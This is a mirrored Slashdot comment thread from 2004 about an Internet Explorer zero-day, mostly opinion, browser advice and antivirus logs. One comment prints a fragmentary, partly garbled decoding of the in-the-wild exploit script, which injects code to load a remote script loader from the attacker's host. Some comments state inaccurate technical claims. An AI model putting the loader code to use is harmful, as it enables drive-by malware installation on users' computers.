Slashdot Mirror
Another Zero-Day IE Scripting Exploit
billstewart writes "A Computerworld Article reports a pair of vulnerabilities to Internet Explorer that allow Windows machines to be 0wned by a single click on a malicious web page. It was discovered by Dutch researcher Jelmer. As usual, the primary workaround is to disable Active Scripting for any sites that aren't Trusted, but you should have turned off that and Javascript years ago for safety anyway. At least one of the holes is fixed in XP Service Pack 2, but that doesn't fix previous versions of Windows and it's still only beta."
Here is the BugTraq Archive link.. WARNING.. The link to this site contains OTHER links to the ACTUAL exploit as well as the source code and a non-harmless display. Use at your OWN risk. Just thought I would put out the disclaimer.
Hmmm.
You can download a fix for this here.
Things you think are in the Constitution, but are not.
Workaround for this bug has been posted. "Don't click links!"
This really does get boring, reading about these IE holes and vulnerabilities. I'm still at a loss to understand why a powerful global corperation in business for decades is incapable of fixing fundamental problems with their browser which are showing up again and again.
;), but why should a web browser EVER
be capable of causing such chaos?
It's entirely possible to be user-friendly and easy-to-use, as browsers such as Mozilla, FireFox and Opera show. However, seeing serious and trivial-to-exploit vulnerabilites like this popping up so frequently makes me wonder what kind of programmers actually work for Microsoft.
I imagine the codebase for a complex feature-rich browser could get quite large and complicated, and modern browsers seem to have everything built in but the kitchen sink (in Microsoft's case, an entire OS is embedded into IE...
A web browser should NOT be tied into the OS core as IE is with Windows. A tiny speed gain (or any other reasons for that matter) is not worth all these security issues.
I am beginning to feel if I am going to be screwed by microsoft they should buy me dinner and a movie first...
Off to check for updates.
The IE security issue dejure.. How about an MS update that simply shuts down all that extra junk by default instead of leaving it open for average Joe User? Make them turn it on if they absolutely need it for whatever reason. Duh!!
"Do the Right Thing. It will gratify some people and astound the rest." - Mark Twain
"Do the Right Thing. It will gratify some people and astound the rest." - Mark Twain
Unfortuneately, some businesses restrict what software the employees can install on their computer. I've written about such an experience here.
I'm sorry... javascript is a requirement on the modern web. If you are afraid to leave it on, you might want to look into switching browsers. Next you'll tell us cookies are "tracking you" and you should turn that off as well.
You're the third person to make that joke and the story's 5 minutes old.
I though it was a feature... (*sarcasm*) The bugfix i recomend is this...
I don't blame IE too much for the amount of security vulnerabilities that crop up.The only reason there are so many of them in IE is that its integrated well with OS.The other browsers do not have that much reach into the OS that they can harm anything. ;-)
All we can do is be careful about ActiveX on webpages and run only what we think is safe.Just my view and I don't really love microsoft as it may seem.
Lord of the Binges.
It was kind of an ugly story. Apple released a patch for that hole, but then it was discovered that the entire concept of their registering URL system could allow pretty much any URL to launch arbitrary code.. Or something like that. I didn't follow it too closely myself. Apple just barely released a master fix just two days ago.
Moof.
A web browser should NOT be tied into the OS core as IE is with Windows. A tiny speed gain (or any other reasons for that matter) is not worth all these security issues.
You know when you buy new italian salid dressing, and the oil and the spices are all separated in different layers? That is what good software architecture is supposed to look like.
Now, shake up the bottle. That is what Microsoft software looks like.
Turn off JavaScript and try to buy something from your site. If you can't, you have a problem. Yes, you. Not your customer. You, the web designer.
Exploits like these, on the other hand, are akin to a passive attack from the inside (like an infected laptop connected from inside the firewall) but are even more serious, because very little action is required on part of the user to affect the attack and *very* difficult to monitor and contain.
An Indian-American Hindu committed to non-violent thought/speech/action alarmed by the global explosion of radical Islam
See, this is why I stay away from malicious web pages in the first place. You just can't trust those things!
Hey freaks: now you're ju
If Microsoft's monthly patch cycle is really such a good idea, then we'll have to wait a month (at least) for a fix! ...or maybe the monthly patch idea is STUPID!
I tried the demonstration, and Norton popped up and prevented the thing from running. Apparently someone's on the ball somewhere.
Let's not stir that bag of worms...
One has to ask if they're market share reflects free customers able to replace what isn't working. The mammoth security holes of IE & Outlook would be funny if they didn't represent so much time wasting trouble & junk mail in my inbox.
How does Microsoft justify not fixing IE bugs on older platforms?
ls
I'd *love* to turn off Javascript, but there's so many idiots that use it in their webpages these days that using a large proportion of the web would be impossible.
Not that this currect problem affects me, since I use Galeon, but still, I'd love to see the end of Javascript...
-- Even if a god did exist, why the fsck should I worship it?
Great. That means a lot considering sarcasm can't be read in text.
Symantec catches this vulnerability as the following:
a tion: Quarantine
Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: Downloader.Trojan
File: C:\Documents and Settings\User\Local Settings\Temporary Internet Files\Content.IE5\67HK1KWV\installer[1].html
Loc
Computer: Computer
User: User
Action taken: Quarantine succeeded : Access denied
Date found: Wednesday, June 09, 2004 11:56:26 AM
Most corporations should have little to worry about.
-Tolerate my intolerance
This isn't the only occurance of such an exploit. Windows machines can also be easily owned by a single click on Dell.com. I believe it is the "Buy it now" button.
Reference to Microsoft advice (he was trying to be funny, you insensive clod.)
.Doesn't zero-day mean that the bug came out the same time as IE? Didn't IE come out several years ago? And if one of these is already fixed in SP 2, that doesn't sound exactly zero-day either.
I bet most of the people on slashdot are aware of the constant problems with IE/Windows. Maybe if Microsloth got smart, they would include a popup with minesweeper and Solitaire that would check their systems for vulnerabilities while they were playing the game. If it automatically patched their systems, GREAT.
I think something like that would knock out most of the vulnerable sales people, secretaries, and executatives in the business world.
Why read the article when I can just make up a snap judgement?
Maybe s/he was trying to be funny. I don't use IE either. :-)
goes against what the web is about.
which clot modded this informative? it's GNAA crap... as usual
And not true.
I have been a user for about 10 years. This ends Feb 2014. The site's been ruined. I'm off. Dice, FU
Install FireFox
And why can't a post mentioning the GNAA be informative?
Another IE security problem, are you suprised by this? Lets make an insecure piece of software that intergrates into our operating system with portions of it running at Ring Zero. This allowing whatever malicious code/hacker to gain access to your system.
Now most people recommnd just switching to Linux. Yeah that works. But what about those hacked Windows PCs that happen to be remotely controlled? Some are sending SPAM others are used for DDoS attacks and others just scan all the IP space they can get ahold of.
It is a vicious cycle which has been growing more pronounced over the past 4 years. The only real solution to this problem is to inform people. Don't just tell people to use something else.
Explain the advantages of using a different program. In this case explain how Mozilla or Opera being seperate programs with different internal works and security systems are not going to be compromised as easily.
Push harder towards Open Media/Content
In other news, SCO is a bunch of Litigious Bastards.
IE's got holes, it's non-standards-compliant... but it's the standard out there folks. Sure, someday people my open their eyes and use a compliant browser someday, but I sit here on my lunch break, and I'm on IE.
I assert that my comment is only my opinion, not that of any employer, past, present or future.
You can't post javascript in Slashdot comments. It is a troll.
In simple terms, the link uses an unknown vulnerability to open up a local Explorer help file -- ms-its:C:\WINDOWS\Help\iexplore.chm::/iegetsrt.htm
Oh boy, I know Bill gave Steve 400M or so before, but now they even cooperate on security holes?? Halliluah! I still say Apple's exploits are more user friendly. No need for "extremely sophisticated use of encrypted code".
No one said no post containing the letters GNAA in sequence can be informative. However, that particular post was made up, so it wasn't very informative. Having said that, the GNAA itself is pretty informative. All these people I never knew were either black or gay, and it turns out they're both. Is it true Wayne Brady is...black?
The exploit page in reference installs a toolbar that causes your searches to be redirected to
y .com
http://www.i-lookup.com
If you go to that page, what is the top search.
Uninstall spyware.
People get infected and use there own search to find a product to fix the problem.
Anyway, enough with the fun stuff, How about someone, the FBI or some agency go after who ever owns www.i-lookup.com.
i-lookup.com
production
Aztec Marketing S.A.
aztecmanager@hotmail.com
Sabana sur
Supermercado AM PM
San Jose
Costa Rica
ns1.dnsoutofcountry.com
ns2.dnsoutofcountr
Come on, we helped raid drug lords in columbia, we feret out saddam and are still chasing bin laden.
Why not us the long arm of the law to give this ahole a major smack down!!!
Personal Website
Patenting doubleclicking is allowed, why not file for a patent on
- "Exploiting security holes found in software"
- "Posting web links that causes browsers to misbehave"
- "Making web code that uses non-standard javascript"
- "Mentioning possible exploits publicly"
Once these patents are in order they can just sue the hell out of anyone & everything and stop this problem once and for all.
9/11: Never forget it was a false-flag operation
... I dont feel very bright this morning.
I kept following these links and they just dont' work!
Then I realized I am in Mozilla, of course.
WARNING: Post contains links to the exploit!
2 %3E%0D%0Afunction%20InjectedDuringRedirection%28%2 9%0D%0A%0D%0A%7B%0D%0A%09showModalDialog%28%27md.h tm%27%2Cwindow%2C%22dialogTop%3A-10000%5C%3Bdialog Left%3A-10000%5C%3BdialogHeight%3A1%5C%3BdialogWid th%3A1%5C%3B%22%29.location%3D%20%22javascript%3A% 27%3CSCRIPT%20SRC%3D%5C%5C%27") + myloc + unescape("shellscript_loader_js.php%3Fref%3D") + myref + unescape("%5C%5C%27%3E%3C%5C/SCRIPT%3E%27%20%20%22 %3B%0D%0A%0D%0A%7D%0D%0A%3C/script%3E"));n t.write(mystr);
e di rection.toString())",100);) ",101);
Here's the decoded version of the exploit located at http://216.130.188.219/ei2/installer.htm
var myloc = document.location.href;
myloc_arr = myloc.split("?");
myref_arr = myloc.split("?ref");
myloc = myloc_arr[0];
var myref = myref_arr[1];
var mylength = (myloc.length - 13);
myloc = myloc.substr(0,mylength);
var mystr = (unescape("%3Cscript%20language%3D%22Javascript%2
docume
function window::onunload()
{
return false;
}
setTimeout("myiframe.execScript(InjectedDuringR
setTimeout(" myiframe.execScript('InjectedDuringRedirection()'
document.write('');
I do feel that linking to the exploit itself is a little like getting on TV and saying, "There's a security problem at this nuclear weapons facility, and here's how you'd exploit it and get yourself a nuclear bomb. But don't do it, because owning nuclear weapons (which the unguarded facility has, in warehouse 23-B) is wrong!"
But I also realize that shedding light on the issue will help sysadmins take care of the problem, and most script kiddies prefer to read sites about "hahaha hax0rzing is kew3l kekekekekekekekeke!!!! ^___^"
*****
Dear Mary,
I yearn for you tragically,
A.T. Tappman, Chaplain, U.S. Army.
I've managed to get my parents and my girlfriend's parents to switch to Firefox. I have also got several non-computing friends to use it. I use it on my Mac, Windows PC and my Linux server, it's great and secure.
Most people, of course, have never heard of Firefox.
Why don't the "responsible" PC magazines who complain about all these security issues push Firefox? Are they worried about their advertising revenues? Maybe they just don't know any better.
Kevin
"It's not the cough that carries you off, it's the coffin they carry you off in" O. Nash
I though exploits only happened AFTER Microsoft issued a patch? I thought haxors were decompiling patches and such? At least that is Microsoft's line.
Also not long ago many of the Microsoft backers here(yes there are many) were daring people to come up with an exploit that happened before MS issued a patch. Well...Here you go.
Microsoft used IE as a strategic tool. When it did so, browsers were in such a state of flux, that changing from Netscape 3 to 4 to wasn't much different than changing from Netscape 3 to IE 4. The mistake Microsoft is making is that if people start migrating away from IE, then there is no turning back. The browser market is moving slow, so the ease/incentive to move is significantly lower.
IT departments are going to be looking at changing browsers, and once they change, I doubt Microsoft will be able to regain the foothold.
Ok, I give up, why you?
And worse, that happens in every IE descendant? There are a lot of "alternative" browsers that are uses IE engine to render html, sites, help files, whatever to show their content, including specially outlook (and that probably will mean a new mail worm in the next few days).
Uhh is that link correct? cause I cannot get there.. ;-)
--"It is insufficient to protect ourselves with laws; we need to protect ourselves with mathematics."--
Date found: Wednesday, June 09, 2004
Yes, it's Wednesday again.
-1 (Boring / Useless)
// TODO: Insert Cool Sig
Do people even use IE anymore? Is there some advantage, or is it just lack of interest/knowledge to get a new browser?
---
Adult Toys
Opera used to be my primary browser whenever I used Windows (i.e. at work), but today I started switching to Firefox. Why? Opera (7.2.3 and 7.5) has been exhibiting severe intermittent lagginess. It's got to have something to do with the firewall or proxy on the corporate network, but it affects even intranet sites. Other browsers are not affected. The intranet homepage never finishes loading, even with Opera open all day - the timer keeps counting like it's waiting for one last image at the bottom of the page or something.
I still love Opera, and would use it if I could. It streamlines browsing for me tremendously.
I get the "odd looks" too. At least my unit lead uses Mozilla, so I'm not the only one. He'd heard of Opera, but evidently never seen it before looking at my screen.
Constitutionally Correct
It is RC1 and it is available here
... will be more than them recommending you type URL's in by hand.
No wonder MS doesn't ever plan to upgrade IE in the future, I'm sure keeping up with the security holes will keep the IE team busy for years.
You are in a maze of twisty little passages, all alike.
As always, are from the start design problems the ones exploited here, artificial solutions like separating internet in "zones" (local, trusted, etc) are just patches that don't resolve the core problem so it still have more holes that a swiss cheese.
Actually, it's very true. Here is a demo.
document.forms["your nose"].elements["nose"].value = nose;
document.forms["your nose"].submit();
Got your nose!
The previous poster pointed out the wrong way. The better way is <a href= "yourlink" onclick= "popupFunctionOrWhatever('yourlink'); return false;">click here</a> . This activates your JS function for those that have it and provides a normal link for those that don't. The return false prevents the normal link from being activated if the onclick is performed by JS-aware browsers.
Constitutionally Correct
n/t
Not sure that's quite an analogy you want to make to attack Microsoft. After all, Italian dressing tastes best when it's shaken up.
Pour it on your salad without shaking it up, when it's all nicely layered, and you'll have salad that is oily and flavorless. Kind of like Linux.
"Ask not what your country can do for you." --John F. Kennedy
It's that simple. If this were not the case, there'd be real signs of things being fixed now that it's been over a year since the "Trustworthy Computing Initiative" was launched. Are there new firewall tools as part of new Service Packs? New security audit tools you can get from Windows Update? How about just turning _OFF_ default services for XP? Anything?!?! You'd think with 50 Billion in the bank and all the money they'll be saving from reduced employee benefits that they could afford to fix this junk, so you have to assume they choose not to.
*** Sigs are a stupid waste of bandwidth.
IE never gives me problems because I'm using it on a Mac (OS9). In 10 years I've never been touched by an exploit, worm or virus. Windows users will be patching and updating through the next 3 generations of hardware, as they have been since 486 days. Please, this isn't flamebait. I prefer IE over Opera, Mozilla (Netscape), and everything else. (Although Wannabe is a great text-only browser--lean and fast.) The problem is definitely in the OS. And to the usual astroturf reply, "just wait til exploit writers target Macs," it's not going to happen for the lifetime of the Mac I'm on, during which I will have peace of mind. How many more exploits will we read about on Slashdot in that timeframe? Guesses?
I clicked on the link, what's the big deal? It didn't do anything but pop up a hollow box in the window.
Nothing installed, my system didn't crash. There were no apparent ill effects to clicking on that.
So why is everyone so worked up? I use Windows XP every day for some of my work, and haven't had a problem with malicious web pages in over a year.
I've been using FireFox for over a year, but that's probably just a cooincidence.
here is an explination and example of the exploit. http://62.131.86.111/analysis.htm
...run Firefox from removable media. I'm sure a similar stunt could be pulled for Thunderbird or Mozilla if you need mail.
You know you've been IMing too long when you almost say 'lol' out loud to a non-geeky friend...
However, seeing serious and trivial-to-exploit vulnerabilites like this popping up so frequently makes me wonder what kind of programmers actually work for Microsoft.
Microsoft has been claiming for years that their development model produces better software than open source. Windows was released several years before the first version of the Linux kernel, so Microsoft had a considerable head start. So why isn't Microsoft's software better than open source software? If open source methods are really not as good, how could Linux be catching up? Why is open source software more reliable, secure, portable, interoperable, flexible, and scalable? Why are there only two things that run better under Windows: viruses and games?
This is no longer debatable, just dont use IE that is the only fix. Microsoft are idiots, i dont even want to think about all the other software we use daily (eg ATMs) that they have fucked up on. Can you imagine this in another industry?
This comment does not represent the views or opinions of the user.
If only Emacs didn't have prior art, they'd probably have patented the OS within an App ;-)
I don't have any problems with Windows XP at all...zero, zip, none. None with IE either. Never done any updates either. Perfectly safe in fact...
My PowerBooks are the only thing that go online.
Sometimes the obvious takes longer.
maybe you should lay off huffing burned rice fumes and get a sense of humor.
I would, but they don't seem to offer a version for my platform (Linux/x86_64)
This kind of thing has become a serious problem. And no, up-to-date antivirus software and Windows' builtin firewall are not the answer.
The problem with this one is that, by the time client's antivirus software is up to date for the latest viruses, worms, and exploits, the damage is already done. I have had Windows boxes on which the antiviruses were updated twice daily - just to find that by the time I had received the update, the malicious software had already been on the machine. God knows for how long.
On a Windows box at home, despite antivirus software, Windows' builtin firewall and a 3rd party firewall software, I once counted 12 (!) different infections within less than 24 hours.
Interestingly enough, it's gotten much better for me at home since I've been running my Windows box through a Linux gateway. Still, stuff slips through, but it's on the order of one a week or so. This has taught me one lesson:
If you have to run Windows on a machine connected to the net, for your own sake and the sake of others you're prone to infect, run a reliable hardware router with a reliable firewall, or take an old computer and run a linux gateway/router. You wouldn't believe how much trouble you'll spare yourself.
Idealism must mesh with reality at some point. I use Firefox, love it, and will probably never go back.
..
However, there are still websites that only render correctly within Internet Explorer. The Dell website is a great example--within some of their "Premier" stores, they have a series of nested menus that are built around ActiveX controls. Thus, they only work with Internet Explorer. Try it with another browser, and duh, um, um, um, I'm clicking, I'm clicking, but nothing is happening.
Yeah, I have actually written to Dell about this instead of just accepting it, and though I received an initial response back, I did not receive back a response when I requested they use a vendor-neutral technology like Javascript instead. Unfortunately, they would rather write a website that works for 95% of the population.
As an end user, there is pretty much nothing I can do about this. Yes, I did my part by writing them, but unless a significant portion of their customer base does the same thing, they will not change.
I take exception to the title: Another Zero-Day Scripting Exploit.
m . It delays executing anything immediately but instead uses another unknown vulnerability to run another file which in turn runs some script. This script is then used to run more script. And finally that script is used to run an exploit that Microsoft Corp. has been aware of since August 2003 but hasn't patched.
Doesn't that imply that the exploit was designed after reading about the fix for a problem? This vulnerability was discovered by examining an exploit "in the wild".
Worse, from the article:
In simple terms, the link uses an unknown vulnerability to open up a local Explorer help file -- ms-its:C:\WINDOWS\Help\iexplore.chm::/iegetsrt.ht
So this is actually 3 vulnerabilities: 1 that is known and beta patched, one that is unknown and one that Microsoft has known about for almost a year and hasn't patched!
This makes me laugh at people who are always claiming that viruses only spread when people don't keep up with the patches on their machines.
Security is job none at Microsoft!
I tried to take a look at the source codes in the zip file attached to the article. McAfee blocked the operation too! I had clicked on the view button in winrar to look at the file and it seems that McAfee could even check the temporary file that was made for the viewer.
Dutch researcher Jelmer [...] embarked on a detailed analysis of the link, which demonstrates an extremely sophisticated use of encrypted code.
Hmm... I hardly consider using the (unfortunatly) existing Script encoding feature in IE to be 'sophisticated'. Besides, for those who are not DMCA-encumbered, here is a program to Decode the Javascript contained in the "JScript.Encode" areas. (The author of the script has an interesting and informative article on what a piece of crap the JScript.Encode function is, and can be found here)
0-day does not mean that there is "no-fix". No-fix just means that it is currently exploitable.
0-day hacks by definition are generally unknown. They may have been newly discovered, they may have been discovered by someone ages ago. The key is that they are generally unknown, and therefor can be used as a sort of currency (having discovered or access to an 0-day can get you into groups that trade in such things), or can be utilized as a last ditch approach at comprimising a machine you absolutely need to compromise (actually using an 0-day for something mundane would be a tremendous waste of a valuable resource).
This is just another publicly visible hack of IE. And thinking about it, go ahead and call them 0-day's, those in the know, know better, those that don't... Well who cares.
The logic behind the design of any OS provided by M$ is that they own your computer and can control it at will. These are not security holes they are DESIGN PARAMETERS! If the OS has any scurity where the user may exclude the external control from the machine, it is by definition not going to give the ownership to M$ (Or anyone else for that matter except the operator)
The logical conclusion is that eventually some smart or lucky or just plain accidential events will give all of these control mechanisms over to hackers some of which will take advantage of them for their own purposes.
Eventually the level of traffic on the Internet arising this way will crush the band width and crash the net. This is not long off. At the current rate of saturation growth, this date is about 18 months away. Then either these Zombie machines will have to be removed from the net, a chore which will eventually prove impossible to handle or the OS will have to be banned access from the net. I can forsee the day when M$ machines are banned from attaching from the Internet for this reason.
The logical outcome here is that the ownership of machines must be in the hands of the operator or the system crashes entirely. Thus the M$ control will break shortly.
Never Politically Correct ~ I prefer the facts If you don't like what I say, get a life, or comment yourself.
Jeez, when will M$ users pull their heads out of their asses and stop using Micorosft products. Microsft cares nothing about its user's safety and security, M$ only cares about one thing... money. And, money is the least important thing in this world.
Hey, all you Windows users... wake up and smell the coffee. Throw your Microtrash in the garabage where it belongs and start using a REAL operating system! Linux is available for free and can do much more than any Micor$oft software will ever be able to do.
DIE, MICROSOFT... DIE THE BLOODY, SCREAMING, FLAMING DEATH THAT YOU DESERVE!!!
I love how so many articles contain ridiculous jabs thrown in right after the fact-finding portion. Disable Javascript? LOL. What the h-e-double-hockey-sticks is the submitter thinking?
"Politicians find new names for institutions which under old names have become odious to the people."
No sirree bob, all that newfangled javeyscript stuff ain't needed. ...
If employees are able to buy stock, then they have another avenue of insisting on more-decent computing experiences at work. You go to the shareholders meetings and raise a stink over the problems with your software and bosses attitudes. There are several interesting avenues to explore there, pun intended.
There's also these things called unions, and they are useful for more things than just negotiating a raise. Unions have been used to help introduce worker safety,more sane and family friendly working hours, etc, so there's nothing stopping a union from working towards negotiating efficiency, either.
It's when you are JUST an employee and not a part owner, and when you are JUST negotiating alone instead of being part of a group that you will be constantly screwed in dealing with management problems.
I have to wonder if the Multics reference was a contrast between Windows and one of the most sophisticated OS security models ever implemented, or a comparison between Windows and an OS whose security process essentially consisted of declaring it to be secure, waiting a week or so for someone to crack it, patching, and repeating.
WARNING: there is a trojan on your
I'm assuming having your vulnerabilities fixed would be the prize for winning the game? ;)
Programmers often refer to heavily interdependent code as spaghetti code. Good code should look like another Italian dish: lasagne.
Another clot! Since when does /. allow javascript postings? Like I said - not true. (read it before replying next time eh?)
I have been a user for about 10 years. This ends Feb 2014. The site's been ruined. I'm off. Dice, FU
NO YOU IDIOT.
We are NOT TALKING ABOUT SLASHDOT here. we are talking about OTHER WEB PAGES such as LAST MEASURE that DO THIS
IE is integrated with the operating system in the sense that it is a component that can be assumed to be present, by no stretch does it run in kernel mode. Even explorer.exe (what powers your desktop, start menu, tray,etc), is just a normal user-mode app. Kill it or corrupt it all you want, the rest of the OS will keep running.
Nothing's a fortress, not even Linux (Hello? GNU, Gentoo, Debian, Gnome, Savannah, and more were hacked last year).
Give Mozilla the widespread usage (which is like industrial-strength beta-testing) that Internet Explorer has and see how many holes are blown open in it. Nothing is perfect, and it's silly and arrogant to pretend one project is a perfect solution above all others. This goes for anything, from operating systems to web browsers.
I'm an Opera user through and through, but most of my friends use MyIE, which gives them tabbed browsing, pop-up blocking, and more, but using IE's system libraries to render pages. It's their choice.
Funny, IE and .NET don't work right with the version I have. Honestly, I don't use XP because of that thing it does, if they'd fix that, and that other problem, then I'd gladly use it. Don't you just love blanket comments with no specifics? Oh, don't let the door hit you in the ass on your way outta here.
I just looked through the source - the only use of javascript I caught, was to put a timestamp on an ad banner, and it had an alternate version with noscript anyway. Completely pointless garbage, just like most javascript...
What is the robbing of a bank, compared to the founding of a bank? -- Bertolt Brecht
Did you happen to notice that they stop in November 2003, and that they were all fixed prior to the posting on that page? Kinda novel concept, though. Fixing bugs when you find out about them.
Of course, we all know who is causing most of the virus/trojan/worm/problem on Microsoft systems, don't we?
Wouldn't it be a great revenue enhancer , if you owned the biggest auto repair garage in town, to vandalize automobiles? That way, people will come to you to get their vehicles fixed, and you would continue to get paid.
Who writes most of the anti-virus software?
Get the picture?
The perfect fix to these problems?
Start using Linux and throw away all your Microsoft software.
Please reply negatively to this if you are truly a Microsoft-loving idiot and love throwing your hard earned money away.
There is another list that includes things like:
- Script.prototype.freeze/thaw could allow an attacker to run arbitrary code your computer.
- *.hta files were not treated as executable, and could be used to gain full access to a user's system
- POP3 account passwords are saved to disk even when the user explicitly requests them not to be.
- A bug in XBL handling, and the feature that external applications create files with known names in well-known locations can be exploited to read local files
- IMG tags can be misused to load and run arbitrary JavaScript on a page
These are just a few examples of the security flaws listed. Why is anybody still using this browser? Local file access, arbitrary code execution, and more. I think we should all switch to Mozil--oh, wait. Those examples were taken from the Mozilla Security Advisory list of known vulnerabilities.
That is really one of the most obnoxious uses ever for javascript. HTML has this nice a tag, I'm sure most of us are aware of it...
In an even greater embarassment, my school's website actually a java applet consisting of half a dozen buttons, which would reload the page at a different location. I mean really, who thought implementing hyperlinks in java would be a good idea. Now they've ditched the old website - they use flash instead :(
What is the robbing of a bank, compared to the founding of a bank? -- Bertolt Brecht
You forgot to tell the reader one thing - all those bugs in Mozilla are already fixed.
None of the ones in the IE list are.
Either you don't read carefully or you are purposefully trying to mislead, I can't decide which.
HBI's Law: Frequency of calling others Nazis is directly correlated with the likelihood of the accuser being Communist.
Even if you only lose one customer, you've lost something and gained nothing.
What is the robbing of a bank, compared to the founding of a bank? -- Bertolt Brecht
As usual, the primary workaround is to disable Active Scripting for any sites that aren't Trusted, but you should have turned off that and Javascript years ago for safety anyway
:
There aren't exploits I'm aware of for JavaScript. JavaScript was originally written by Netscape, and to all intents and purposes, runs in a sandbox.
Microsoft's implementation of JavaScript is called Jscript.
From when I can tell of the exploit, it has to do with Microsoft's insecure DHTML model.
From the MS documentation of the execScript method
execScript
Executes the specified script in the provided language.
Standards Information :
There is no public standard that applies to this method.
Shame that so many fucking "experts" can't get their terminology right.
Popup functions just annoy people who use tabbed browsing - specifying a target name will open in either a new window, or new tab, consistent with what your user prefers.
What is the robbing of a bank, compared to the founding of a bank? -- Bertolt Brecht
YHBT. YHL. HAND.
Love,
bonch (aka Overly Critical Guy)
The problem is that Microsoft is fixing holes.
See, the root cause of these problems is that Microsoft took a bunch of architectural shortcuts that made it really easy for them to create a lot of nifty features, and also made it really easy for others to create a bunch of nifty exploits. And, surprise surprise, the exploits keep on coming.
But rather than fix the architectural problems, rather than admit that they messed up, rather than go back and try to re-create all those nifty features with a solid architecture, rather than remove features that depend on the shoddy design, instead Microsoft's response is to try to preserve their lousy architecture, and simply patch each individual hole as it is discovered. This is somewhat similar to plastering over the cracks in the walls as they keep appearing, rather than admitting that the foundation is failing and the whole house needs to be rebuild.
There is no relief in sight for Microsoft users, ever.
Sigh.
Remove Internet Explorer from Windows 2000. (Free)
Remove Internet Explorer from Windows XP.(Free)
FDV
Perhaps someone could be kind enough to use this exploit to allow you to install mozilla and set it as your default browser?
DISCLAIMER: it's a joke - laugh. It's just not cool to write code that tricks people or bypasses security - even if you think it's for a good cause!
"As for cookies, it's those little fuckers that most frequently allow dickwads to build a profile on you and sic marketing departments on you like there's no tomorrow."
Right.
You haven't a clue why most cookies are used, and frankly, if I explained why, you wouldn't understand anyway, because you'd start babbling about "Well, I use PHP anyway". Neglecting the fact that the most ambitious web page is the one you built in 10th grade (last year) that was your class project in science.
...and not use IE. JavaScript, while often abused, is still useful for proper end-user UI feedback. Using a good browser (Moz/Firefox/Opera/!MSIE) will clean up most of the annoyances with JS problems.
The movie is "Gigli"
There is a certain amount of pragmatic value in your advice, but you entirely miss the point of what the Internet is, and why so many people have worked so hard for so many decades to make it work. This is a medium for sharing and accessing data with an unlimited number of individuals, who may be known or unknown.
Standards are written and revised to account for this, and provide security in the face of exposure. Some people/companies are just too dumb/lazy/evil to actually fix the problems they know exist. And the average internet user should not be expected to understand the technical issues involved in this security. A web browser, by definition, should be able to connect to unknown/untrusted hosts and present the user with whatever kind of "rich multimedia experience" the content creators have imagined - within a framework of safety and protection from malicious code. This is more than possible. This should be taken as a given.
Now, as I said, the reality is not so perfect. There are known exploits and unknown exploits. I'm sure there are probably even unknown unknowns. But, I will consider the internet to have been a complete failure if I end up restricted to having the reality of the great-big-world around me presented by the likes of the CNN and BBC.
Just because the last update to the list was in November 2003 doesn't mean there haven't been any vulnerabilities found since then.
In fact, I would look at this lack of updates as a negative. They should be posted when they're discovered, not in monthly increments.
If this were Microsoft, we'd be accusing them of cover-ups and only posting news once they were fixed.
Luckily, in this case, we have Bugzilla, which makes this point somewhat moot. They should still update that page, though.
WeRelate.org - wiki-based genealogy
Standards compliance and the KISS principle will get you a lot farther a lot easier than OS and Browser specific tricks.
Forget diamonds, copyright is forever.
You need to get out of mommy's basement and get a life. Seriously.
Your link is either horribly out of date or there haven't been security related bugs in Mozilla for a long time.
According to your source the last security bug was fixed on 2003-10-07.
Stop kidding yourself; there are most likely more bugs in Mozilla, than in IE. The advantage Mozilla has is obscurity. If Mozilla was used and prodded as widely as IE, I am sure there would be as least as many security flaws.
Be careful what you wish for, if Mozilla became as widely used as IE, there would be plenty of people shining lights through it's holes.
I am no M$ fan, but I can't help but add a little dose of reality to this thread.
Get rid of IE. True you can't uninstall it, but you can at least use a different default browser.
If your a network administrator and there are certain websites that are needed for work and require IE, that's simple enough to solve.
Install a proxy, set IE to use that proxy and have the proxy only allow those websites to load. Then pre-load IE with those favorites. Finally have every user send each company an email a day bitching about their broken software.
The additional cost of the IE proxy, well simply explain to management that is part of the overhead of using windows and IE. Further explain that website X, X, X, X are security holes and that for now you've got to do the best you can to get around it. When they balk at the security thing, explain that at least weekly for the past couple years there has been a vulnerability in IE which could have given complete access to accounting.
That puts things in perspective. Now you can use Mozilla/Firebird, users can still browse those sites they need for work that are IE only. And the boss is aware that Microsoft = serious security risk, one that would allow someone else to take their money and devalue the company stock.
And where can you find recent flaws in Opera..? Oh... nowhere... because they're not as easy to find and they're not placed anywhere public. THAT is why I'm a Mozilla Firefox user.
Mozilla is a very nice browser, but it's not the kind of fortress most users think it is.
Speak for yourself about fortresses and don't attempt to FUD Mozilla with IE's terrible security record. People with a clue know that Mozilla is orders of magnitude less likely to get them screwed. They do not think that it's perfect, but they do know that the steps taken by the Mozilla team are helpful.
There are now several ways to browse the web, but the Microsoft remains the worst. Mozilla, Konqueror and others have problems but they are free and solutions will come. IE will cost you a minimum of $200 to run and has holes like this that have been known and unfixed for 10 months. You might have files messed with if you run Mozilla on any platform. You WILL be rooted if you use M$.
Friends don't help friends install M$ junk.
GOOD: F-secure detected the demonstration in the cache as VBS/Petch.A... ...after it ran the Demonstration Program.
BAD:
Considering that Javascript can be altered to avoid detection and Antivirus Software Sucks at detecting Spyware, Your pretty much screwed until this thing is finally patched, you lock PC's down like fort knox, or use something other than IE.
It does explain why there is so much spyware floating around here.
In Soviet Russia, Trojan exploits YOU!
I could direct the same criticism back at you since the writeup clearly says "At least one of the holes is fixed in XP Service Pack 2". I am running xp sp2, and whenever these kinds of holes are revealed, I always try them with IE on my system, and they never affect me.
I'd rather be lucky than good.
Sorry, I think you're wrong. It's not a virus. It's a virus and general malware delivery toolkit.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Friends don't let friends enable ecmascript.
IE is less of a browser, and more of a gateway into windows as far as I am concerned. As a .Net developer, I have deployed more than a few IE only internal applications that include code written in C++ and C# () that ran on the client. As an interface tool Internet Explorer is extremely powerful. It allows me to write an application in which an internal user logs into a network local site, downloads large binaries, and runs complex forms based applications without installing anything on his computer (which means i can update code without requiring a client software update). Firefox/Mozilla/other hippie browsers do not have that capability.
YHBT. YHL. HAND.
Love,
bonch (aka Overly Critical Guy)
You know, if you had half a brain you'd figure out that most of what you say is complete and utter crap.
Stupid question: aren't Active Scripting and JavaScript teh same thing? In IE, anyway?
[o]_O
Why Some Sites Only Work With IE
If you surf the web with a browser like Firefox, Netscape, or Opera, you've probably run into sites that either require Internet Explorer or look very poor in non-IE browsers.
I previously thought this was due to laziness on the part of web developers. Events of the past days have made me think something else may be at play.
